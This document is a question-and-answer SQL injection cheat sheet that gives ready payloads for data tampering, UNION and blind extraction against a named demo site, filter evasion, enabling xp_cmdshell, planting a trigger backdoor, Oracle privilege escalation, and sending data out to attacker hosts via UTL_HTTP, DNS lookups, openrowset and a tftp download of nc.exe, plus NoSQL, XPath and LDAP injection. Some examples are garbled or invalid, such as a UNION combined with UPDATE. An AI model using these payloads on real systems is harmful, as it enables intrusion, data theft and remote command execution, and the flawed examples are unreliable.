Q: - How to update/modify record in DB using SQLi?

for example, we have two columns in our salaries table and among 2 one is salary and other is.

foo'; UPDATE salaries SET salary=9999999 WHERE userid='jsmith

Note: foo is the value and it could be anything.

*************************************************************************************

Q: - How to insert record in DB using SQLi?

for example, we have two columns in our salaries table.

bar'; INSERT INTO salaries VALUES ('cwillis', 999999); --

Note:

1- bar is the value and it could be anything else.

2- -- sign commit extra things in original query except our own manufactured query.

3- semi-colon is used to terminate our manufactured query.

*************************************************************************************

Q: - How to combine two SQL statements in one SQLi attack?

select userid, password,ssn,salary,email from employee where userid=101 union update employee set
salary=99999 where userid=101; --

Note: you can see that there are two SQL statements one is select and other is update. They both run at
the same time to execute attack on DB using union keyword.

*************************************************************************************
Q: - How to Create Database Back Door Attacks?

Database backdoor often works with trigger but keep in mind not every Database support triggers. Now
the question is how to create such trigger. We can create trigger but keep it in mind that first you have
to know which column is more vulnerable. In this case email is our most vulnerable column because on
this base whenever new user will be created email of attacker will be updated with the new user email.
To create a Database trigger, you need to inject the following SQL:

101';CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE
employee SET email='[email protected]'WHERE userid = NEW.userid

*************************************************************************************
Q: - How to check number of columns in Database SQL?

We can check number of columns in Database by providing NULL or empty string.

' UNION SELECT NULL--

' UNION SELECT NULL,NULL--

' UNION SELECT NULL,NULL,NULL--

*************************************************************************************
Q: - How to check whether the column datatype is string or integer SQL?

We can check datatype by providing string one by one in each column.

' UNION SELECT 'a'--

' UNION SELECT NULL,'a'--

' UNION SELECT NULL,NULL,'a'--

*************************************************************************************
Q: - How to check number of columns in oracle?

In oracle we can check number of columns easily but oracle always use 'from' clause with select
statement. So, we use DUAL table for this purpose. DUAL is globally accessible table in oracle.

' UNION SELECT 'a' from DUAL--

' UNION SELECT NULL,'a'from DUAL--

' UNION SELECT NULL,NULL,'a'from DUAL--

*************************************************************************************
Q: - How to get DATABSE version by using version string in SQL?

' UNION SELECT @@VERSION,NULL,NULL--

*************************************************************************************
Q: - How to detect DB version in oracle using version string?

' UNION SELECT banner,NULL,NULL FROM v$version--

*************************************************************************************
Q: - How to get 4th number table from the sys.tables list?

(select top 1 name from sys.tables where object_id=( select top 1 object_id from

(select top 4 object_id from sys.tables order by object_id)

sq order by object_id desc)) --

This query include 2 sub-queries and number 2 sub-query will generate only 1 table which is located at
4th position. First query in which column "name" is mentioned will run at the end to get the column
name only. Here "sq" is just alias nothing else, and same technique will be used for column fetching let’s
try it.

(select top 1 name from sys.columns where object_id=(select top 1 object_id from

(select top 4 object_id from sys.columns order by object_id)

sq order by object_id desc))--

*************************************************************************************
Q: - How to detect blind SQL injection?

We can detect blind SQL injection by Boolean method I mean yes or no method.

for i.e., we can use this kind of query for injection.

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select count(*) from
sys.tables)=8

then powerkw

else torquenm end

& asc=false

in this query it is stated that user is asking a question whether count of sys.tables is equal to 8 or not and
we used if(when), else statement in this query.

we can also use > sign or < sign because it is simply yes or no injection.

*************************************************************************************

Q: - How to get the name of the first table using blind SQL injection?

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select top 1 name

from sys.tables)='UserProfile'

then powerkw

else torquenm end

&asc=false

*************************************************************************************
Q: - How to get to know the name of the first table by guess only?

We can use alphabet check and will use substring to check the first letter of the first table in the
Database.

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select top 1

substring(name,1,1) from sys.tables)='UserProfile'

then powerkw

else torquenm end

&asc=false
name is the column name where 1 is the first letter and next 1 mean take one character which means it
will check only first letter of the table.

*************************************************************************************

Q: - What is the smart way to detect first table of the Database?

Simple and smart way of guessing table name is ASCII.

Bin. Hex. Dec. ASCII Symbol Explanation

-------------------------------------------------------------------------------------------------

0000000 0 0 NUL The null character prompts the device to do nothing

0100000 20 32 SP Blank Space (Space)

0100001 21 33 ! Exclamation mark

0100010 22 34 “ Only quotes above

0100011 23 35 # Pound sign

0100100 24 36 $ Dollar sign

0100101 25 37 % Percentage Sign

0100110 26 38 & Commercial and

0100111 27 39 ‘ Apostrophe

0101000 28 40 ( Left bracket

0101001 29 41 ) Right bracket

0101010 2A 42 * Asterisk

0101011 2B 43 + Plus symbol

0101100 2C 44 , Comma

0101101 2D 45 - Dash

0101110 2E 46 . Full stop

0101111 2F 47 / Forward slash

0110000 30 48 0

0110001 31 49 1

0110010 32 50 2
0110011 33 51 3

0110100 34 52 4

0110101 35 53 5

0110110 36 54 6

0110111 37 55 7

0111000 38 56 8

0111001 39 57 9

0111010 3A 58 : Colon

0111011 3B 59 ; Semicolon

0111100 3C 60 < Small than bracket

0111101 3D 61 = Equals sign

0111110 3E 62 > Bigger than symbol

0111111 3F 63 ? Question mark

1000000 40 64 @ At Symbol

1000001 41 65 A

1000010 42 66 B

1000011 43 67 C

1000100 44 68 D

1000101 45 69 E

1000110 46 70 F

1000111 47 71 G

1001000 48 72 H

1001001 49 73 I

1001010 4A 74 J

1001011 4B 75 K

1001100 4C 76 L

1001101 4D 77 M

1001110 4E 78 N

1001111 4F 79 O
1010000 50 80 P

1010001 51 81 Q

1010010 52 82 R

1010011 53 83 S

1010100 54 84 T

1010101 55 85 U

1010110 56 86 V

1010111 57 87 W

1011000 58 88 X

1011001 59 89 Y

1011010 5A 90 Z

1011011 5B 91 [ Left square bracket

1011100 5C 92 \ Inverse/backward slash

1011101 5D 93 ] Right square bracket

1011110 5E 94 ^ Circumflex

1011111 5F 95 _ Underscore

1100000 60 96 ` Gravis (backtick)

1100001 61 97 a

1100010 62 98 b

1100011 63 99 c

1100100 64 100 d

1100101 65 101 e

1100110 66 102 f

1100111 67 103 g

1101000 68 104 h

1101001 69 105 i

1101010 6A 106 j

1101011 6B 107 k

1101100 6C 108 l
1101101 6D 109 m

1101110 6E 110 n

1101111 6F 111 o

1110000 70 112 p

1110001 71 113 q

1110010 72 114 r

1110011 73 115 s

1110100 74 116 t

1110101 75 117 u

1110110 76 118 v

1110111 77 119 w

1111000 78 120 x

1111001 79 121 y

1111010 7A 122 z

1111011 7B 123 { Left curly bracket

1111100 7C 124 l Vertical line

1111101 7D 125 } Right curly brackets

1111110 7E 126 ~ Tilde

1111111 7F 127 DEL Deletes a character.

*************************************************************************************

Q: - How to use ASCII characters to guess the table name?

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select top 1

ascii(lower(substring(name,1,1))) from sys.tables)=119

then powerkw

else torquenm end

&asc=false
Here ascii is Database keyword and lower is also a Database keyword. ascii keyword will used to detect
ascii character number and lower keyword will be used to change the cap to lower case. Here 119='w'
character. Now we have got the first character of table. Let’s guess the 2nd character.

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select top 1

ascii(lower(substring(name,2,1))) from sys.tables)<=119

then powerkw

else torquenm end

&asc=false

So, we got 108='l' now we have two characters in our list 'wl'. Let’s try next guess.

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select top 1

ascii(lower(substring(name,3,1))) from sys.tables)<=98

then powerkw

else torquenm end

&asc=false

and we got another letter which is 98='b' now we have three letters in our bucket 'wlb'.

*************************************************************************************

Q: - How to check Database right?

To check wheter user read something?

select is_rolemember('DB_datareader')

To check wheter user write something?

select is_rolemember('DB_datawriter')

To check wheter user own this DB?

select is_rolemember('DB_owner')
*************************************************************************************

Q: - How to execute command shell in SQL Server via SQL command?

First, we have to compromise the security of the SQL server and then

reconfigure cmd shell.This command is use to granting rights to user.

----------------------------------------------------------------------------------

exec 'xp_cmdshell' , 1

reconfigure

now we can exec cmd shell comand

---------------------------------

exec xp_cmdshell 'ping troyhunt.com'

sometimes this command cannot execute directly in web browser because ping command

will return 12 row or less than that. So, we write this record in txt file.

----------------------------------------------------------------------------------

exec xp_cmdshell 'ping troyhunt.com > c:\temp\ping.txt'

so we can execute this command later in this context...

--------------------------------------------------------

exec xp_cmdshell 'type c:\temp\ping.txt'

*************************************************************************************

Q: - How to circumvent simple validation?

Some input validation routines employ a simple blacklist and either block or remove any supplied data
that appears on this list. In this instance, you should try the standard attacks. For example, website
owner has blacklisted the word "SELECT" now we will counter this issue like this.
SeLeCt

%00SELECT

SELSELECTECT

%53%45%4c%45%43%54

%2553%2545%254c%2545%2543%2554

whatever the method you choose depend on you.

*************************************************************************************

Q: - What to do if app blocks or strips spaces from your input?

If the application blocks or strips spaces from your input, you can use comments (/*you can write
anything here*/) to simulate whitespace within your injected data. For example:

SELECT/*foo*/username,password/*foo*/FROM/*foo*/users

*************************************************************************************

Q: - Write down syntax, if user encounter space issue and keyword issue at the same time?

In MySQL, comments can even be inserted within keywords themselves,

which provides another means of bypassing some input validation filters while

preserving the syntax of the actual query. For example:

SEL/*foo*/ECT username,password FR/*foo*/OM users

*************************************************************************************

Q: - What is the role of openrowset in MS SQL 2000 Database attack?

On older Databases such as MS-SQL 2000 and earlier, the OpenRowSet command can be used to open a
connection to an
external Database and insert arbitrary data into it. For example, the following query causes the target
Database to open a connection to the attacker’s Database and insert the version string of the target
Database into the table called foo.

insert into openrowset(‘SQLOLEDB’,

‘DRIVER={SQL Server};SERVER=mdattacker.net,80;UID=sa;PWD=letmein’,

‘select * from foo’) values (@@version)

*************************************************************************************

Q: - What is the role of UTL_HTTP in ORACLE Database attack?

The UTL_HTTP package can be used to make arbitrary HTTP requests to other

hosts. UTL_HTTP contains rich functionality and supports proxy servers, cookies,

redirects, and authentication. This means that an attacker who has compromised

a Database on a highly restricted internal corporate network may be able to

leverage a corporate proxy to initiate outbound connections to the Internet.

In the following example, UTL_HTTP is used to transmit the results of an

injected query to a server controlled by the attacker:

/employees.asp?EmpNo=7521’||UTL_HTTP.request(‘mdattacker.net:80/’||

(SELECT%20username%20FROM%20all_users%20WHERE%20ROWNUM%3d1))--

This URL causes UTL_HTTP to make a GET request for a URL containing the

first username in the table all_users . The attacker can simply set up a netcat

listener on mdattacker.net to receive the result:

C:\>nc -nLp 80

GET /SYS HTTP/1.1

Host: mdattacker.net

Connection: close
*************************************************************************************

Q: - What is the alternative approach if utl_http does not work in cooperate networks due to firewall
implementation?

Here UTL_INADDR package is designed to be used to resolve hostnames to IP addresses. It can be used
to generate arbitrary DNS queries to a server con-trolled by the attacker. In many situations, this is more
likely to succeed than the UTL_HTTP attack, because DNS traffic is often allowed out through corporate
firewalls even when HTTP traffic is restricted. The attacker can leverage this package to perform a
lookup on a hostname of his choice, effectively retrieving arbitrary data by prepending it as a subdomain
to a domain name he controls.

For example:

/employees.asp?EmpNo=7521’||UTL_INADDR.GET_HOST_NAME((SELECT%20PASSWORD%

20FROM%20DBA_USERS%20WHERE%20NAME=’SYS’)||’.mdattacker.net’)

This results in a DNS query to the mdattacker.net name server containing

the SYS user’s password hash: DCB748A5BC5390F2.mdattacker.net

*************************************************************************************

Q: - What is the use of UTL_SMTP & UTL-TCP?

The UTL_SMTP package can be used to send e-mails. This facility can be used

to retrieve large volumes of data captured from the Database by sending this

in outbound e-mails.

The UTL_TCP package can be used to open arbitrary TCP sockets to send and

receive network data.

*************************************************************************************

Q: - What is delay time technique?

In this technique Database query would cause a time delay, contingent on some condition specified by
the attacker. The attacker can submit his query and then monitor the time taken for the server to
respond. If a delay occurs, the attacker may infer that the condition is true. Even if the actual content of
the application’s response is identical in the two cases; the presence or absence of a time delay enables
the attacker to extract a single bit of information from the Database. By performing numerous such
queries, the attacker can systematically retrieve arbitrarily complex data from the Database one bit at a
time.

*************************************************************************************

Q: - How to implement time delay technique in MS SQL?

MS-SQL contains a built-in WAITFOR command, which can be used to cause a specified time delay. For
example, the following query causes a time delay of 5 seconds if the current Database user is sa:

if (select user) = 'sa' waitfor delay ‘0:0:5’

*************************************************************************************

Q: - How we can use ASCII and Substring functions to get data from Database using time delay
technique?

if ASCII(SUBSTRING(‘Admin’,1,1)) = 64 waitfor delay '0:0:5'

if ASCII(SUBSTRING(‘Admin’,1,1)) = 65 waitfor delay '0:0:5'

we will compare first alphabet of substring 'Admin' to an ASCII 64 which is equal to A.

*************************************************************************************

Q: - How to use sleep function in different Databases?

MS SQL Server: -

if (ASCII(SUBSTRING(‘Admin’,1,1)) and (POWER(2,0))) > 0 waitfor delay ‘0:0:5’

MySQL (version<5.0.12): -

select if(user() like ‘root@%’, sleep(5000), ‘false’)

MySQL (version>5.0.12): -

select if(user() like ‘root@%’, benchmark(50000,sha1(‘test’)), ‘false’)

it also performs hash function normally SHA1

PostgreSQL: -

the PG_SLEEP function can be used in the same way as the MySQL sleep function

Oracle: -

has no built-in method to perform a time delay, but you can use other tricks to cause a time delay to
occur. One trick is to use UTL_HTTP

connect to a nonexistent server, causing a timeout. This causes the Database to attempt to connect to
the specified server and eventually

time out. For example:

SELECT 'a'||Utl_Http.request('http://madeupserver.com') from dual

...delay...

ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1556

ORA-12545: Connect failed because target host or object does not exist.

You can leverage this behavior to cause a time delay contingent on some condition that you specify. For
example, the following query causes a timeout if the default Oracle account DBSNMP exists:

SELECT 'a'||Utl_Http.request('http://madeupserver.com') FROM dual WHERE (SELECT username FROM

all_users WHERE username = 'DBSNMP') = 'DBSNMP'

*************************************************************************************

Q: - What are different default Databases in Database systems?

Oracle: -

dual, v$version, all_tables, all_tab_columns

MySQL, PostgreSQL: -

information_schema.tables,information_schema.columns

SQLite: -

SQLite_master
MS SQL Server: -

Master, Model, TempDB, Pubs, Northwind, MsDB

*************************************************************************************

Q: - What if you wouldn't alter where clause or issue a union query after an order by clause?

It is not possible to alter the WHERE clause, or issue a UNION query after an ORDER

BY clause; however, an attacker can create an inference condition by issuing the following statement:

/search.jsp?department=20&sort=(select%201/0%20from%20dual%20where%20 (select
%20substr(max(object_name),1,1)%20FROM%20user_objects)='Y')

If the first letter of the first object name in the user_objects table is equal to 'Y', this will cause the
Database to attempt to evaluate 1/0. This will result in an error, and no results will be returned by the
overall query. If the letter is not equal to 'Y', results from the original query will be returned in the
default order

*************************************************************************************

Q: - How many ways are there to exploit Database without SQL injection?

> If the Database is shared with other applications, you may be able to escalate privileges within the
Database and gain access to other applications' data.

> You may be able to compromise the operating system of the Database server.

> You may be able to gain network access to other systems. Typically, the Database server is hosted on a
protected network behind several layers of network perimeter defenses. From the Database server, you
may be in a trusted position and be able to reach key services on other hosts, which may be further
exploitable.

> You may be able to make network connections back out of the hosting infrastructure to your own
computer. This may enable you to bypass the application, easily transmitting large amounts of sensitive
data gathered from the Database, and often evading many intrusion detection systems.

> You may be able to extend the Database’s existing functionality in arbitrary ways by creating user-
defined functions. In some situations, this may enable you to circumvent hardening that has been
performed on the Database by effectively reimplementing functionality that has been removed or
disabled. There is a method for doing this in each of the mainstream Databases, provided that you have
gained Database administrator (DBA) privileges.
*************************************************************************************

Q: - How we can use MS SQL to gain access to victim computer?

There are two main commands which can be used to access victim system via MS SQL.

1- xp-regread

2- xp_regwrite

MS-SQL contains a wealth of other extended stored procedures, such as xp_regread and xp_regwrite,
that can be used to perform powerful actions within the registry of the Windows operating system.

*************************************************************************************

Q: - How to configure cmd_shell in MS SQL?

EXECUTE sp_configure 'show advanced options', 1

RECONFIGURE WITH OVERRIDE

EXECUTE sp_configure 'xp_cmdshell', '1'

RECONFIGURE WITH OVERRIDE

after configuration we can run cmdshell by this command...

exec xp_cmdshell 'dir'

*************************************************************************************

Q: - Mention some Oracle DB flaws?

Oracle contains many built-in stored procedures that execute with DBA privileges and have been found
to contain SQL injection flaws within the procedures themselves. A typical example of such a flaw
existed in the default package SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES prior to
the July 2006 critical patch update. This can be exploited to escalate privileges by injecting the query
grant DBA to public into the vulnerable field:

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('INDX','SCH',
'TEXTINDEXMETHODS".ODCIIndexUtilCleanup(:p1);
execute immediate ''declare pragma autonomous_transaction; begin execute immediate

''''grant DBA to public'''' ; end;''; END;--','CTXSYS',1,'1',0) from dual

This type of attack could be delivered via a SQL injection flaw in a web application by injecting the
function into the vulnerable parameter.

*************************************************************************************

Q: - How we can use MS SQL to gain access to victim computer?

Although MySQL contains relatively little built-in functions but We can use some of its built-in functions
to access victim's PC.

FILE_PRIV:This built-in function provide the ability to any user to read and write to the file system.

LOAD_FILE: This command can be used to retrieve the contents of any file for example.... select
load_file('/etc/passwd')

OUTFILE: The SELECT ... INTO OUTFILE command can be used to pipe the results of any query into a file.
For example:

create table test (a varchar(200)) insert into test(a) values ('+ +')

select * from test into outfile '/etc/hosts.equiv'

*************************************************************************************

Q: - Write ASCII and SUBSTRING syntax for Oracle, MSSQL and MySQL?

Oracle: ASCII('A') is equal to 65 SUBSTR('ABCDE',2,3) is equal to BCD.

MSSQL: ASCII('A') is equal to 65 SUBSTRING('ABCDE',2,3) is equal to BCD.

MySQL: ASCII('A') is equal to 65 SUBSTRING('ABCDE',2,3) is equal to BCD.

*************************************************************************************
Q: - Write Retrieve current Database user syntax for Oracle, MSSQL and MySQL?

Oracle: Select Sys.login_user from dual SELECT user FROM dual SYS_CONTEXT('USERENV',
'SESSION_USER')

MSSQL: Select suser_sname()

MySQL: SELECT user()

*************************************************************************************

Q: - Write Cause a time delay syntax for Oracle, MSSQL and MySQL?

Oracle: Utl_Http.request('http://madeupserver.com')

MSSQL: waitfor delay '0:0:10' exec master..xp_cmdshell 'ping localhost'

MySQL: sleep(100)

*************************************************************************************

Q: - Write Retrieve Database version string syntax for Oracle, MSSQL and MySQL?

Oracle: select banner from v$version

MSSQL: select @@version

MySQL: select @@version

*************************************************************************************

Q: - Write Retrieve current Database syntax for Oracle, MSSQL and MySQL?

Oracle: SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM dual

MSSQL: SELECT DB_name(). The server name can be retrieved using: SELECT @@servername

MySQL: SELECT Database()

*************************************************************************************
Q: - Write Retrieve current user's privilege syntax for Oracle, MSSQL and MySQL?

Oracle: SELECT privilege FROM session_privs

MSSQL: SELECT grantee, table_name, privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES

MySQL: SELECT * FROM information_schema.user_privileges WHERE grantee = '[user]' where [user] is

determined from the output of SELECT user()

*************************************************************************************

Q: - Write Show all tables and columns in a single column of results syntax for Oracle, MSSQL and
MySQL?

Oracle: Select table_name||''||column_name from all_tab_columns

MSSQL: SELECT table_name+' '+column_name from information_schema.columns

MySQL: SELECT CONCAT(table_name,',column_name) from information_schema.columns

*************************************************************************************

Q: - Write Show user objects syntax for Oracle, MSSQL and MySQL?

Oracle: SELECT object_name, object_type FROM user_objects

MSSQL: SELECT name FROM sysobjects

MySQL: SELECT table_name FROM information_schema.tables (or trigger_name from

information_schema.triggers, etc.)

*************************************************************************************

Q: - Write Show user tables syntax for Oracle, MSSQL and MySQL?

Oracle: SELECT object_name, object_type FROM user_objects WHERE object_type='TABLE'

Or to show all tables to which the user has access: SELECT table_name FROM all_tables
MSSQL: SELECT name FROM sysobjects WHERE xtype='U'

MySQL: SELECT table_name FROM information_schema.tables where table_type='BASE TABLE' and

table_schema!='mySQL'

*************************************************************************************

Q: - Write Show column names for table foo syntax for Oracle, MSSQL and MySQL?

Oracle: SELECT column_name, name FROM user_tab_columns WHERE table_name = 'FOO'

Use the ALL_tab_columns table if the target data is not owned by the current application user.

MSSQL: SELECT column_name FROM information_schema.columns WHERE table_name='foo'

MySQL: SELECT column_name FROM information_schema.columns WHERE table_name='foo'

*************************************************************************************

Q: - Write Interact with the operating system (simplest ways) syntax for Oracle, MSSQL and MySQL?

MSSQL: EXEC xp_cmshell 'dir c:\'

MySQL: SELECT load_file('/etc/passwd')

*************************************************************************************

Q: - Write some "Error Messages" for Oracle, MSSQL and MySQL?

Oracle: ORA-01756: quoted string not properly terminated

ORA-00933: SQL command not properly ended

MS-SQL: Msg 170, Level 15, State 1, Line 1 Line 1:

Incorrect syntax near 'foo'

Msg 105, Level 15, State 1, Line 1

Unclosed quotation mark before the character string 'foo'

MySQL: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server
version for the right syntax to use near ''foo' at line X
Translation: For Oracle and MS-SQL, SQL injection is present, and it is almost certainly exploitable! If you
entered a single quote and it altered the syntax of the Database query, this is the error you’d expect. For
MySQL, SQL injection may be present, but the same error message can appear in other contexts.

*************************************************************************************

Q: - State error message related to parameters for Oracle, MSSQL and MySQL?

Oracle: PLS-00306: wrong number or types of arguments in call to 'XXX'

MSSQL: Procedure 'XXX' expects parameter '@YYY', which was not supplied

MySQL: Not Available

Translation: You have commented out or removed a variable that normally would be supplied to the
Database. In MS-SQL, you should be able to use time delay techniques to perform arbitrary data
retrieval.

*************************************************************************************

Q: - State error message related to UNION SELECT for Oracle, MSSQL and MySQL?

Oracle: ORA-01789: query block has incorrect number of result columns

MS-SQL: Msg 205, Level 16, State 1, Line 1

All queries in a SQL statement containing a UNION operator must have an equal number of expressions
in their target lists.

MySQL: The used SELECT statements have a different number of columns.

Translation: You will see this when you are attempting a UNION SELECT attack, and you have specifi ed a
different data type from that found in the original SELECT statement. Try using a NULL, or using 1 or
2000.

*************************************************************************************
Q: - State error message related to UNION SELECT data type for Oracle, MSSQL and MySQL?

Oracle: ORA-01790: expression must have same datatype as corresponding expression

MS-SQL: Msg 245, Level 16, State 1, Line 1

Syntax error converting the varchar value ‘foo’ to a column of data type int.

MySQL: (MySQL will not give you an error.)

Translation: Your input doesn’t match the expected data type for the field. You may have SQL injection,
and you may not need a single quote, so try simply entering a number followed by your SQL to be
injected. In MS-SQL, you should be able to return any string value with this error message.

*************************************************************************************

Q: - How to tackle “From” keyword not found where expected for Oracle, MSSQL and MySQL?

Oracle: ORA-00923: FROM keyword not found where expected so we can use this query to tackle this
error in ORACLE (SELECT 1 from DUAL)

MSSQL: N/A

MySQL: N/A

Translation: The following will work in MS-SQL:

SELECT 1

But in Oracle, if you want to return something, you must select from a table. The DUAL table will do fine:

SELECT 1 from DUAL

*************************************************************************************

Q: - What error came when injection point occurs before the FROM keyword for Oracle, MSSQL and
MySQL?

Oracle: ORA-00936: missing expression

MSSQL: Msg 156, Level 15, State 1, Line 1Incorrect syntax near the keyword 'from'.
MySQL: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server
version for the right syntax to use

near ' XXX , YYY from SOME_TABLE' at line 1

Translation: You commonly see this error message when your injection point occurs before the FROM
keyword (for example, you have injected into the columns to be returned) and/or you have used the
comment character to remove required SQL keywords. Try completing the SQL statement yourself while
using your comment character. MySQL should helpfully reveal the column names XXX, YYY when this
condition is encountered.

*************************************************************************************

Q: - How to identify long string error for Oracle, MSSQL and MySQL?

Oracle: ORA-00972: identifier is too long

MSSQL: String or binary data would be truncated.

MySQL: N/A

Translation: This does not indicate SQL injection. You may see this error message if you have entered a
long string. You’re unlikely to get a buffer overflow here either, because the Database is handling your
input safely.

*************************************************************************************

Q: - What error will appear when we try to fetch table or view that doesn't exists for Oracle, MSSQL
and MySQL?

Oracle: Translation: ORA-00942: table or view does not exist

MS-SQL: Msg 208, Level 16, State 1, Line 1 Invalid object name 'foo'

MySQL: Table 'DBNAME.SOMETABLE' doesn't exist

Translation: Either you are trying to access a table or view that does not exist, or, in the case of Oracle,
the Database user does not have privileges for the table or view. Test your query against a table you
know you have access to, such as DUAL. MySQL should helpfully reveal the current Database schema
DBNAME when this condition is encountered.
*************************************************************************************

Q: - How to identify grammar error for Oracle, MSSQL and MySQL?

Oracle: ORA-00920: invalid relational operator

MSSQL: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near foo

MySQL: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server
version for the right syntax to use near '' at line 1

Translation: You were probably altering something in a WHERE clause, and your SQL injection attempt
has disrupted the grammar.

*************************************************************************************

Q: - How to identify parenthesis error for Oracle, MSSQL and MySQL?

Oracle: ORA-00907: missing right parenthesis

MSSQL: N/A

MySQL: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server
version for the right syntax to use near '' at line 1

Translation: Your SQL injection attempt has worked, but the injection point was inside parentheses. You
probably commented out the closing parenthesis with injected comment characters (--).

*************************************************************************************

Q: - How to identify general error for Oracle, MSSQL and MySQL?

Oracle: ORA-00900: invalid SQL statement

MS-SQL: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near foo

MySQL: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL
server version for the right syntax to use near XXXXXX
Translation: A general error message. The error messages listed previously all take precedence, so
something else went wrong. It’s likely you can try alternative input and get a more meaningful message.

*************************************************************************************

Q: - What does it mean by unimplemented feature for Oracle, MSSQL and MySQL?

Oracle: ORA-03001: unimplemented feature

MS-SQL: N/A

MySQL: N/A

Translation: You have tried to perform an action that Oracle does not allow. This can happen if you were
trying to display the Database version string from v$version but you were in an UPDATE or INSERT
query.

*************************************************************************************

Q: - How to catch SYSTEM VIEW error for Oracle, MSSQL and MySQL?

Oracle: ORA-02030: can only select from fixed tables/views

MS-SQL: N/A

MySQL: N/A

Translation: You were probably trying to edit a SYSTEM view. This can happen if you were trying to
display the Database version string from v$version but you were in an UPDATE or INSERT query.

*************************************************************************************

Q: - How could a Database procedure vulnerable?

if a robust stored procedure is being used, SQL injection vulnerabilities can arise if it is invoked in an
unsafe way using user-supplied input. For example, suppose that a user registration function is
implemented within a stored procedure, which is invoked as follows:
exec sp_RegisterUser 'joe', 'secret'

This statement may be just as vulnerable as a simple INSERT statement. For example, an attacker may
supply the following password:

foo'; exec master..xp_cmdshell 'tftp wahh-attacker.com GET nc.exe'-

which causes the application to perform the following batch query?

exec sp_RegisterUser 'joe', 'foo'; exec master..xp_cmdshell 'tftp wahh-attacker.com GET nc.exe'--'

Therefore, the use of the stored procedure has achieved nothing.

*************************************************************************************

Q: - How to comment remaining code in MongoDB?

In JavaScript, a double forward slash (//) signifies a rest-of-line comment, so the remaining code in the
function is commented out.

for example:

function() { return this.username == 'Marcus'//' & this.password == 'aaa'; }

*************************************************************************************

Q: - What is the alternating way to check whether JavaScript code is returning true value or not in
MongoDB code?

An alternative means of ensuring that the $js function always returns true, without using a comment,
would be to supply a username of:

a' || 1==1 || 'a'=='a

JavaScript interprets the various operators like this:

(this.username == 'a' || 1==1) || ('a'=='a' & this.password == 'aaa');

This results in all of the resources in the user collection being matched, since the fi rst disjunctive
condition is always true (1 is always equal to 1).

*************************************************************************************

Q: - How to subvert logic of XPath to get data?

<addressBook>

<address>

<firstName>William</firstName>

<surname>Gates</surname>

<password>MSRocks!</password>

<email>[email protected]</email>

<ccard>5130 8190 3282 3515</ccard>

</address>

<address>

<firstName>Chris</firstName>

<surname>Dawes</surname>

<password>secret</password>

<email>[email protected]</email>

<ccard>3981 2491 3242 3121</ccard>

</address>

</addressBook>

now we will get all email addresses like this:

//address/email/text()

A query to return all the details of the user Dawes would look like this:

//address[surname/text()='Dawes']

The following XPath query effectively verifies the user-supplied credentials and retrieves the relevant
user’s credit card number:

//address[surname/text()='Dawes' and password/text()='secret']/ccard/ text()

In this case, an attacker may be able to subvert the application's query in an identical way to a SQL
injection flaw. For example, supplying a password with this value:

' or 'a'='a

results in the following XPath query, which retrieves the credit card details of all users:

//address[surname/text()='Dawes' and password/text()='' or 'a'='a']/ccard/text()

Note: // these 2 slashes mean that it Selects nodes in the document from the current node that match
the selection no matter where they are.

*************************************************************************************

Q: - What is LDAP and its types?

The Lightweight Directory Access Protocol (LDAP) is used to access directory services over a network.
Types of LDAP:

1- Simple match conditions:

Match on the value of a single attribute. For example, an application function that searches for a user via
his username might use this filter:

(username=daf)

2- Disjunctive queries:

Specify multiple conditions, any one of which must be satisfied by entries that are returned. For
example, a search function that looks up a user-supplied search term in several directory attributes
might use this filter:

(|(cn=searchterm)(sn=searchterm)(ou=searchterm))

3- Conjunctive queries:

Specify multiple conditions, all of which must be satisfied by entries that are returned. For example, a
login mechanism implemented in LDAP might use this filter:

(&(username=daf)(password=secret)